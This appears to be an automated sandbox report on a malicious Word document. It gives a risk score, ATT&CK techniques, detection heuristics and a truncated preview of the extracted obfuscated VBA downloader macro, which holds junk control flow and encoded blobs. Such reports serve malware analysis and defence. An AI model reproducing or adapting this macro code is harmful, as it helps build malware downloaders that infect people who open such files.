MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The macro is triggered by the AutoOpen function and utilizes CreateObject, indicating an attempt to execute code. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' and the presence of a VBA macro named 'macros.bas' strongly suggest this file is a downloader for a second-stage payload. The macro's obfuscated nature and truncated script prevent a more detailed analysis of its specific actions.
Heuristics 8
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 42235 bytes |
SHA-256: aaf7b19465ff42a6f86d04684231270613f29c77afefe2921c6d94b6545b96d4 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 20 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "bQPmaZXZlFkb"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "rnsCYjHvOzdLp"
Function TVNTRQBORNh()
On Error Resume Next
Select Case TwsqY
Case 50364
rKvIqb = Hex(64568 - CSng(19794) - 50212 + ChrW(wiDbZm))
FiwGT = fuRlji
End Select
qAvwjAL = IwsJzD("iDUAMgBkADQANwBlADkAYgAzAGMAMQAyADIANQBhADMAYQA2ADcANwAwADcAZgBiADcAZABhAGIAZQAwADkAZgBlAGMANgBhADIAYwA3AGQAZQAwADcAMQAxADUAOABlADIAMQBiADUQw@AVjb", 2, 138)
Select Case AnMrBk
Case 75092
iAZAwR = Hex(2804 - CSng(65017) - 68363 + ChrW(tLhlub))
XRQNY = BcwcJW
End Select
Select Case ciGdb
Case 69009
PfKSs = Hex(53693 - CSng(52811) - 51135 + ChrW(GhiDpz))
hbEAw = XfvRHo
End Select
MiqhWNzi = IwsJzD("s%iCAOAdid", 5, 3)
Select Case kSvtj
Case 10576
qPjKKa = Hex(57550 - CSng(4853) - 2471 + ChrW(kQijYB))
jXjIi = bUnXw
End Select
Select Case FJtRI
Case 75291
MoKNtB = Hex(93125 - CSng(83157) - 1640 + ChrW(ASqWf))
aZiOh = VbSoBf
End Select
kBciEp = IwsJzD("lzIOXj%seCUrEStRing -k (139..108)))) ) )al", 8, 33)
Select Case UOEam
Case 73796
fqZTXO = Hex(27465 - CSng(54093) - 34698 + ChrW(zdatTr))
ZKbTiu = zRdjr
End Select
Select Case SlGtZ
Case 52550
rubCP = Hex(16 - CSng(20561) - 37421 + ChrW(IVwJc))
IQRkuW = ozPoOW
End Select
AJhDjZnVnZ = IwsJzD("qmYwGIAOAAyADEANwA4ADUAOABC6o7", 5, 22)
Select Case TjNMiz
Case 78358
mtoPa = Hex(19446 - CSng(29533) - 80906 + ChrW(WiTcq))
pjfsFi = alncAc
End Select
Select Case ZLZivo
Case 31907
iiPCC = Hex(10007 - CSng(14403) - 17336 + ChrW(rjlPw))
Mfjziz = wkZuz
End Select
DwicXjHF = IwsJzD("tYQA4ADYAMgBmADkAYwAxAGIAMQBlADgAYQBjAGYANwBkADcAMQBmADgANgBlAGEAZABiAGIAYgBlAGIAOQA4AGMAOAA4AGUAYwBhADUAYQBmAGEAYQAyADAANAA4AGMAZAA4AGYAZQA1ADEANgAzAGMAYgBmAGQAOQBkAGYAZQBhAGQAMgBhAGUAM46Wql", 2, 185)
Select Case jSoZGX
Case 13229
QTaUW = Hex(94022 - CSng(83516) - 24857 + ChrW(tWdjN))
PoiCd = fdHIbZ
End Select
Select Case ZQbBU
Case 16662
ZtiYTU = Hex(81590 - CSng(63687) - 65246 + ChrW(KbNGV))
sHXUY = isIDws
End Select
jCzrL = IwsJzD("@2C0vDEANQBmADkAZAAyADMANQA4AGQAZAAyAGQAYgAzAGEAYQBlADQAOABjADcAMwAwAGQANQBjADMANAAwZC", 6, 79)
Select Case zFADT
Case 71111
EtwJJs = Hex(61980 - CSng(19567) - 64101 + ChrW(KzEvi))
woVdOq = PVwUk
End Select
Select Case cmidV
Case 71837
vSiPJ = Hex(37839 - CSng(3177) - 39551 + ChrW(QRZWN))
cODIfj = jtrvuh
End Select
fAaJBIADK = IwsJzD("PVI5BtSNwA2ADUAMQA3ADcAYwBhADgAMQAwAGMAMQBjAv4", 8, 37)
Select Case rNkWl
Case 35986
UGVGw = Hex(76129 - CSng(91062) - 93150 + ChrW(wFLzJ))
aNFcD = oYOYUD
End Select
Select Case wFStL
Case 87846
HbOFi = Hex(86054 - CSng(80963) - 75789 + ChrW(cdIsk))
ZjTsRZ = JjcEV
End Select
bEhsHNqLXwk = IwsJzD("1l7uGMAZABiAGYAYgBjADkAOABkADAAMQBhADUAMAA2ADMAYwA4ADMAMgBjADkAMABiADgAOQAxADMAZgA4ADgAYwA1AGIAMgA2AGQAYQA1AGMANgBjADIANgBiADgANABkADYANwAyAGUANABjADYAYgBlAGYAMgA1AGQAYQBjADIAZQAwAGQANABjAGUAZAA2AKi", 5, 192)
Select Case rnWwrD
Case 46503
OUqaQ = Hex(42293 - CSng(53111) - 27942 + ChrW(scjBj))
ZTczjR = ciWBwT
End Select
Select Case Xpkzi
Case 76332
CXVzK = Hex(38389 - CSng(98583) - 77947 + ChrW(zfaBzX))
whnoRz = PjMUrv
End Select
PwERcYGLF = IwsJzD("CXDYANwBhADYANQBiADEANwA2ADcANgBiAGUAMAAzADIAMABmADUAMwA1ADEAYwA0ADkAMQA0ADQAOAA4AGUAMAB76E%2", 3, 86)
Select Case JTNcUU
Case 18683
Ftnpv = Hex(76596 - CSng(2908
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.